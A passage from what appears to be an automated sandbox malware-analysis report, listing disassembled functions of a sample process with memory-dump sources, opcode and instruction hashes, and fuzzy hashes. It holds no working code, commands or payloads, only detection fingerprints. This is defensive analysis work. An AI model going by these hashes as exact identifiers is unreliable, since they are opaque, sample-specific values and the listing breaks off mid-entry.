                                                                                                                • Instruction ID: bb2445043efc8689357864784809f7069cf7fca095e76eb07aaea60b2ecc1c3b
                                                                                                                • Opcode Fuzzy Hash: f161c366ea56967fde51b1cda70e2d93fa4c29168fc7c03aeabf6b4c8cefb5c0
                                                                                                                • Instruction Fuzzy Hash: D7219F75F046069FDB10CF69E880AAEBBF6EB48710F108029E909F7390E735D941CB91
                                                                                                                Function 06CA3B30 Relevance: .1, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e2bc4bfd6298b84b0895e232c6dabe6109b512120799291007fce979c01e6778
                                                                                                                • Instruction ID: 78a1d5ce705829e7409e20db64ea1366d9625e2ec15918961bbce356ea130f23
                                                                                                                • Opcode Fuzzy Hash: e2bc4bfd6298b84b0895e232c6dabe6109b512120799291007fce979c01e6778
                                                                                                                • Instruction Fuzzy Hash: 0F219F75E046169FDB50DFA9E890AAEBBF6EB48610F108129E909E7380E735DD018B94
                                                                                                                Function 014BD006 Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4149107630.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_14bd000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3fa1d993b25c1fe2f367b2bb1e7744e929965263ff134ea6843c489768b8df3e
                                                                                                                • Instruction ID: 39fa3a40088c6f1262f51d89221b22a6495a87bfb274e5e61ec02978d6c75f7d
                                                                                                                • Opcode Fuzzy Hash: 3fa1d993b25c1fe2f367b2bb1e7744e929965263ff134ea6843c489768b8df3e
                                                                                                                • Instruction Fuzzy Hash: 76312B7150E3C49FDB138B64C890751BF71AF46214F19C5DBD8888F2A3C23A981ACB62
                                                                                                                Function 014BD20C Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4149107630.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_14bd000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d588744cfb2861fb45887967dced34f561d46b1f643935eba6d2ee75dd360fa8
                                                                                                                • Instruction ID: 019af87365a5c7dc8d2a610ef1237a89034608657a0afbd881aabb92b39faa3c
                                                                                                                • Opcode Fuzzy Hash: d588744cfb2861fb45887967dced34f561d46b1f643935eba6d2ee75dd360fa8
                                                                                                                • Instruction Fuzzy Hash: 50214671904284DFDB09DF58D5C4B6BBB65FB84338F20C6AAD8090B366C37AD406CA71
                                                                                                                Function 014BD3BC Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4149107630.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_14bd000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a0a515b2fe5a52c272ed5b7905ea06d430044c71f412b3f9121bd68ec45c1c14
                                                                                                                • Instruction ID: 38d20afc6d7b5f80669b5ed8c817da953a6f1b93c228507c2b674116fc2a4e0f
                                                                                                                • Opcode Fuzzy Hash: a0a515b2fe5a52c272ed5b7905ea06d430044c71f412b3f9121bd68ec45c1c14
                                                                                                                • Instruction Fuzzy Hash: B2212571900200DFCB05DF58D5C4BA6BB65FB84318F20C5BED8094B366C37AE446CA71
                                                                                                                Function 014BD044 Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4149107630.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_14bd000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 80d602155e46468ff50cb0a580de2af79c52e88091a2158399be190b0650082a
                                                                                                                • Instruction ID: adee3e82caa9c93bf2b841fa075df1085a721e410f4cef4b6fc8f04cdd18f608
                                                                                                                • Opcode Fuzzy Hash: 80d602155e46468ff50cb0a580de2af79c52e88091a2158399be190b0650082a
                                                                                                                • Instruction Fuzzy Hash: 112100B1904204DFCB15DF68C9C4B66BBA5FB8831CF20C5AAE9494B366C73AD447CA71
                                                                                                                Function 06CA6D6B Relevance: .1, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7021a2731c0d286e90cfc81a9b9efd93d9d18c8379135d5e4b72c8957a3e57d4
                                                                                                                • Instruction ID: 429d7dedaaa88bc7b43a12e150bbf8a0633825c31958a4efc2d4c0f8b5766d29
                                                                                                                • Opcode Fuzzy Hash: 7021a2731c0d286e90cfc81a9b9efd93d9d18c8379135d5e4b72c8957a3e57d4
                                                                                                                • Instruction Fuzzy Hash: F821C034F1121A9FDF84DA69E8546AEB7B3EB84358F288429E405EB344D731ED52CBD0
                                                                                                                Function 06CA30D7 Relevance: .1, Instructions: 64COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 081323744c5a1cc52d963ee3aa76d72e42561f3baca98f13030bbc2fb5e33345
                                                                                                                • Instruction ID: 3e1cb89dd014fef8a76f4f441bc671c06a6890a9ea99b9d553d8f81a7c6fb64e
                                                                                                                • Opcode Fuzzy Hash: 081323744c5a1cc52d963ee3aa76d72e42561f3baca98f13030bbc2fb5e33345
                                                                                                                • Instruction Fuzzy Hash: CB11B475E002194FCF54DBB8D8905EEB7B1FB89304F10456AD109EB344DA31CA41CB90
                                                                                                                Function 06CA3C40 Relevance: .1, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 845222be8278a5846d8d8788be20df60593cebad6b84d1d908c7c9a054ab047f
                                                                                                                • Instruction ID: 9af068c829e627b434c132fbac1ef511b6422881ee5e88600281f51af38be51c
                                                                                                                • Opcode Fuzzy Hash: 845222be8278a5846d8d8788be20df60593cebad6b84d1d908c7c9a054ab047f
                                                                                                                • Instruction Fuzzy Hash: 0B118232B142255FDB54AA78CC246AF76AAEBC8219F004139D40AE7340EE34DD0287D1
                                                                                                                Function 06CA54A1 Relevance: .1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 56d6231e2e75201f4dde72f8478a2570110af30c5bf78183d2777779b98efe84
                                                                                                                • Instruction ID: c4a02d4cd960a81db4659c7a0728d71b4f466caf62ea5e508df8bf5c04f251a1
                                                                                                                • Opcode Fuzzy Hash: 56d6231e2e75201f4dde72f8478a2570110af30c5bf78183d2777779b98efe84
                                                                                                                • Instruction Fuzzy Hash: 3F115171A007069FCB20CFA9DDC59AFFBB3FB84304B548929D11597654D731A9498BD0
                                                                                                                Function 06CA38F8 Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 228bf8a76ee3735f11c3ead7066df214f642137ed83e421e0c3cf9208915b1fd
                                                                                                                • Instruction ID: dc024ca032b08f664483f98559a5bf10487bfb78e2d49242d8d9228902c6c682
                                                                                                                • Opcode Fuzzy Hash: 228bf8a76ee3735f11c3ead7066df214f642137ed83e421e0c3cf9208915b1fd
                                                                                                                • Instruction Fuzzy Hash: 3821E8B1D01259AFCB00DFA9D984ADEFFB8FB48324F10822AE518B7250C774A554CFA5
                                                                                                                Function 06CAEDE9 Relevance: .1, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3f0d9fe2d77bd42220138ce80e69846ca21ddb4ee8acfb937810071b6897244b
                                                                                                                • Instruction ID: c95aa978bb3bb22849373ce54d845e2fadbf452b44ba872ec6a68406f5bf0911
                                                                                                                • Opcode Fuzzy Hash: 3f0d9fe2d77bd42220138ce80e69846ca21ddb4ee8acfb937810071b6897244b
                                                                                                                • Instruction Fuzzy Hash: EA01D431B101221FDB659A3D9864B6F67EADBCA614F14883EF109CB341DD21CE0643D5
                                                                                                                Function 06CA4289 Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8f0b2a35ce7a028f26a09d2294325c357af2698c588321436f5bb6f3402140a7
                                                                                                                • Instruction ID: ca3591413cd4124e1ac0823c0c38556b66107c207bb9ca0da88c2ed07ca3ed66
                                                                                                                • Opcode Fuzzy Hash: 8f0b2a35ce7a028f26a09d2294325c357af2698c588321436f5bb6f3402140a7
                                                                                                                • Instruction Fuzzy Hash: 8401A234B101110BDB589AADA458B2FA7DAEBC9714F14883EE10ECB744ED61DD424385
                                                                                                                Function 014BD207 Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4149107630.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_14bd000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                • Instruction ID: 241f74394840691f1794ed0d6971be5f7a9ea64ad04a358aa935fc412e4486ea
                                                                                                                • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                • Instruction Fuzzy Hash: 4611DD76904284CFDB06CF54D5C4B56BF61FB84228F24C6AADC490B756C33AD40ACBA2
                                                                                                                Function 014BD3B7 Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4149107630.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_14bd000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction ID: 0a69a55cf7900102232aeebf82ca42aa449d72cd939c3c10ac17d239769c4120
                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction Fuzzy Hash: D7119075904240DFDB06CF54D5C4B56BF61FB44318F24C6AAD8494B766C33AE44ACF61
                                                                                                                Function 06CAFF2B Relevance: .1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 59991858c658cd9781eff5392e8c1cfb6b55f6608db1763c2dfbdb5e84dbff5d
                                                                                                                • Instruction ID: 31c00042aa64450cfcd453bbef650da52bc32526d7a6f400f2c301a1b11a66af
                                                                                                                • Opcode Fuzzy Hash: 59991858c658cd9781eff5392e8c1cfb6b55f6608db1763c2dfbdb5e84dbff5d
                                                                                                                • Instruction Fuzzy Hash: 8B01D234A0A3498FCB51EFB8E81469EBFF1EB46208F1041BFC459C7256EB708945CB92
                                                                                                                Function 06CA3900 Relevance: .1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d3bbd93215242b6e01b107d6a7d49d24ea4283e010c8e299ecd92221159327ae
                                                                                                                • Instruction ID: 46060ff69daf40c4b1e2097fb307cf2077fa623abbe5494fa275db286afff1bf
                                                                                                                • Opcode Fuzzy Hash: d3bbd93215242b6e01b107d6a7d49d24ea4283e010c8e299ecd92221159327ae
                                                                                                                • Instruction Fuzzy Hash: 7F11D3B1D01259AFCB00DF9AD984ACEFFB4FB48314F10812AE918A7240C374A554CFA5
                                                                                                                Function 06CA4290 Relevance: .1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e87a3218f38b753e7c8f328210bfb2a73e69aec0117f66ef33831eca9d881be0
                                                                                                                • Instruction ID: 4ae8dc428dc5acfa1e247bbf20c6ad79c3469869f916fa9da529913a1c2c479b
                                                                                                                • Opcode Fuzzy Hash: e87a3218f38b753e7c8f328210bfb2a73e69aec0117f66ef33831eca9d881be0
                                                                                                                • Instruction Fuzzy Hash: EA01D130B001210BDB689AAEA458B2FB7DAEBC9714F10C83EE10EC7744EDA1DC024389
                                                                                                                Function 06CA3C37 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 88adb70184f7d6442f5f730eb1d90c6c1db5734e91266a1ec07ba60afd249da5
                                                                                                                • Instruction ID: 0ea190917429bce65b318bc78f15c2cbe24ff3c0cc12b4802b8c58fde426c403
                                                                                                                • Opcode Fuzzy Hash: 88adb70184f7d6442f5f730eb1d90c6c1db5734e91266a1ec07ba60afd249da5
                                                                                                                • Instruction Fuzzy Hash: D101D632B141255BEB949A78DC246EF36AFDBC8208F00423ED50EE7340EE24DD0247D1
                                                                                                                Function 06CAEDF8 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bd0af9fe2e36feb031cae34588ca9d39c159350308f475524a4879a1716c621e
                                                                                                                • Instruction ID: d1146ff91fb3f0e9cc4cf4171980ad7380676a8454966b3fcb8e4b075f15000e
                                                                                                                • Opcode Fuzzy Hash: bd0af9fe2e36feb031cae34588ca9d39c159350308f475524a4879a1716c621e
                                                                                                                • Instruction Fuzzy Hash: C6018C35B101221BCF649A7EA454B2FB7DADBCDA14F14883DE10ACB344EE21DD0253D5
                                                                                                                Function 06CAA363 Relevance: .0, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d7e3d26f3c14853bf338f8dd61faccf527ca47f7a56a460ada493bd89fb9cb68
                                                                                                                • Instruction ID: 09b22833e784234d96fe3043e10c1852e13b36def0870833e043af9cc87cecc2
                                                                                                                • Opcode Fuzzy Hash: d7e3d26f3c14853bf338f8dd61faccf527ca47f7a56a460ada493bd89fb9cb68
                                                                                                                • Instruction Fuzzy Hash: C001447AB012110FDBA0EAB8E45472F73D6DB8A614F10883DE10EDB300EE31DD428380
                                                                                                                Function 06CAA368 Relevance: .0, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 82daaa50c3118d8cebdf9a15559300c4ed7fcdda720b192f3df225644d8f7ade
                                                                                                                • Instruction ID: 782d7086e90fbab13e4aeb658c816a2e2888bee461abcd9771a9a28909e960c0
                                                                                                                • Opcode Fuzzy Hash: 82daaa50c3118d8cebdf9a15559300c4ed7fcdda720b192f3df225644d8f7ade
                                                                                                                • Instruction Fuzzy Hash: AC01D134B012151FDB60EAB9E454B2EB7DAEB8A614F10883CE10ACB340EE25DC428384
                                                                                                                Function 06CAC83B Relevance: .0, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b79764c03e70a3df11bbb87c664137746f195a9893efb76afe42ed39b630e335
                                                                                                                • Instruction ID: 66d0742146535459e037f5868fb4af80dd0a23a300643fd9b52ed80315a85019
                                                                                                                • Opcode Fuzzy Hash: b79764c03e70a3df11bbb87c664137746f195a9893efb76afe42ed39b630e335
                                                                                                                • Instruction Fuzzy Hash: 2701F935E112259FDF54AA79E944A9EB776FB84314F00403EE905FB344D7319D0487C0
                                                                                                                Function 06CAFF48 Relevance: .0, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 23f27c89fdfc1b95888c561ec88c4dfaba2a25cc0373f8cf4987b76911f2f770
                                                                                                                • Instruction ID: 6cbddf40b73e1510a5e4bb50e8aaaf822f64b6da0c1f04d9e16881b111f8bb38
                                                                                                                • Opcode Fuzzy Hash: 23f27c89fdfc1b95888c561ec88c4dfaba2a25cc0373f8cf4987b76911f2f770
                                                                                                                • Instruction Fuzzy Hash: C0F0F874A0520A8FD780FFBCD91426EBBE6EB89204F50417E8919D7358FB70D951CB92
                                                                                                                Function 06CA64D8 Relevance: .0, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b1e4d1d0e0239d94ad5c8150abef5ce9cc382e3732ad53e4c4ecdfa255f5cb5f
                                                                                                                • Instruction ID: caca3d19e83f570309681b60e2f3afffefc84fe456d01fbf0104157e442bccf4
                                                                                                                • Opcode Fuzzy Hash: b1e4d1d0e0239d94ad5c8150abef5ce9cc382e3732ad53e4c4ecdfa255f5cb5f
                                                                                                                • Instruction Fuzzy Hash: F1E0C270E1034AABDF60CEB5C915B5AB3ADD70120CF2488B8D408C7201E172CF018380
                                                                                                                Function 06CA64D1 Relevance: .0, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c4cf5273b10736d61f85677db980052fdaba009d3335e2fd0ff260dfbcf63c12
                                                                                                                • Instruction ID: b9e6751e7c91bea150a80a78af18e660f1bfebf356ad930d2762d11c89f6cbdc
                                                                                                                • Opcode Fuzzy Hash: c4cf5273b10736d61f85677db980052fdaba009d3335e2fd0ff260dfbcf63c12
                                                                                                                • Instruction Fuzzy Hash: 95E0CD70E1424697EF50CEB5C72475B73A9D74020CF248879D808D7201E135CF019380

                                                                                                                Non-executed Functions

                                                                                                                Function 06CA76F8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2222239885
                                                                                                                • Opcode ID: a44cc7dd4dc541fc7d635aee753ee629f61bb1b0f8433d0cbb45b9ae75c031d4
                                                                                                                • Instruction ID: e0f2527b963eb93a29a8b1db4ee62bba36a3faf100b68afa185c18c4276df6e8
                                                                                                                • Opcode Fuzzy Hash: a44cc7dd4dc541fc7d635aee753ee629f61bb1b0f8433d0cbb45b9ae75c031d4
                                                                                                                • Instruction Fuzzy Hash: 15122D34E0031A8FDB68DF69C954AAEB7F6BF88304F208569D409AB354DB309D85CF91
                                                                                                                Function 06CAA990 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-3823777903
                                                                                                                • Opcode ID: 58aa07c5f145bcbefc9d74fc98f04c9e1a2aba456f02963615cd36e35484cc79
                                                                                                                • Instruction ID: 07ace5e8e7ab072aca7515777105e134b33b6e914b476404c603f7d2fc687593
                                                                                                                • Opcode Fuzzy Hash: 58aa07c5f145bcbefc9d74fc98f04c9e1a2aba456f02963615cd36e35484cc79
                                                                                                                • Instruction Fuzzy Hash: 0C913D30E0030A9FEB68EFA5D554B6EBBF6BF84308F108529E401AB294DB759D45CB90
                                                                                                                Function 06CA70F8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-390881366
                                                                                                                • Opcode ID: 5d86fbe3c808facd0574aa4290841d6e498a9a63820329d634dcfa7431aa0506
                                                                                                                • Instruction ID: 24124d3018a48c569d4061be23980a77c76fcab3c60e4ff5f9984fe422265001
                                                                                                                • Opcode Fuzzy Hash: 5d86fbe3c808facd0574aa4290841d6e498a9a63820329d634dcfa7431aa0506
                                                                                                                • Instruction Fuzzy Hash: 97F14D34A0130ACFDB59EFA9D594A6EBBB6FF84304F108529D405AB3A8DB35DC46CB50
                                                                                                                Function 06CA8428 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
